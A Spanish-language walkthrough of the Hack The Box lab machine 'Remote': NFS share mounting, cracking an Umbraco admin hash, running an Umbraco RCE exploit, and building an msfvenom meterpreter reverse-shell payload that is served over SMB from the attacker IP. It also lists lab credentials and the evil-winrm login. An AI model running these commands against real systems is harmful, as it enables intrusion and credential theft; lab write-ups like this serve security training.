Hacemos el reconocimiento de nmap:
Identificamos un ftp como anonymous habilitado, pero no encontramos nada:
Y si accedemos al contenido del puerto 80, vemos lo siguiente:
Realizamos fuzzing web y encontramos los siguientes directorios; y encontramos algo que dice umbraco:
Donde tenemos el siguiente panel de login:
Probamos con el usuario admin y nos confirman que existe dicho usuario:
Por aquí no encontramos nada, por lo que continuamos enumerando el puerto 111 donde corre el protocolo de NFS, por lo que tenemos tanto las herramientas de nmap como showmount, donde nos encontramos con la montura de /site-backups
En este punto, podemos montar una carpeta en el directorio /mnt y así accedemos al directorio /site-backups:
mount -t nfs 10.10.10.180:/site_backups /mnt/
E identificamos el directorio /umbraco, donde posiblemente podamos encontrar algunas credenciales, pero ello estará dentro del directorio /App_Data y analizando el fichero Umbraco.sdf:
Lo abrimos con el comando strings y vemos información de un usuario administrador:
Y nos fijamos en su hash:
Lo intentamos crackear en crackstation, donde vemos que la contraseña es baconandcheese:
Admin@htb.local:baconandcheese
Y ahora accedemos dentro del panel de login:
Si miramos en el panel de ayuda, vemos la versión:
Si buscamos por internet, vemos que podemos explotar una vulnerabilidad:
Y ahora vamos a clonar el repositorio, instalamos las dependencias y lo ejecutamos:
pip install -r requirements.txt
Lo ejecutamos y vemos las instrucciones del exploit:
Lo ejecutamos proporcionando la información correcta:
python3 exploit.py -u Admin@htb.local -p baconandcheese -w 'http://10.10.10.180' -i 10.10.16.24
Y obtenemos la conexión:
Pero esta conexión es muy inestable, por lo que nos mandamos otra reverse shell utilizando revshells:
Y recibimos la nueva conexión:
Nos ubicamos en \temp:
Lo siguiente será upgradear a una sesión de meterpreter para tener más poder sobre la máquina, por lo que creamos un payload con msfvenom:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.16.24 LPORT=4444 -f exe -o virus.exe
Lo compartimos:
impacket-smbserver recurso $(pwd) -smb2support
Lo recibimos en la máquina víctima:
copy \\10.10.16.24\recurso\virus.exe virus.exe
Nos ponemos en escucha con el multi/handler, estableciendo el payload de un meterpreter, y ya estamos dentro:
Si nos ubicamos en el directorio de archivos de programa, vemos un directorio llamado TeamViewer, que posiblemente dentro de aquí podamos encontrar credenciales:
Con metasploit tenemos un módulo de post explotación que nos permite analizar TeamViewer en busca de credenciales, por lo que vamos a utilizarlo:
Tenemos las siguientes credenciales:
Administrator:!R3m0te!
Probamos en acceder con evil-winrm y ya estamos dentro como el usuario Administrador:
evil-winrm -i 10.10.10.180 -u 'Administrator' -p '!R3m0te!'






























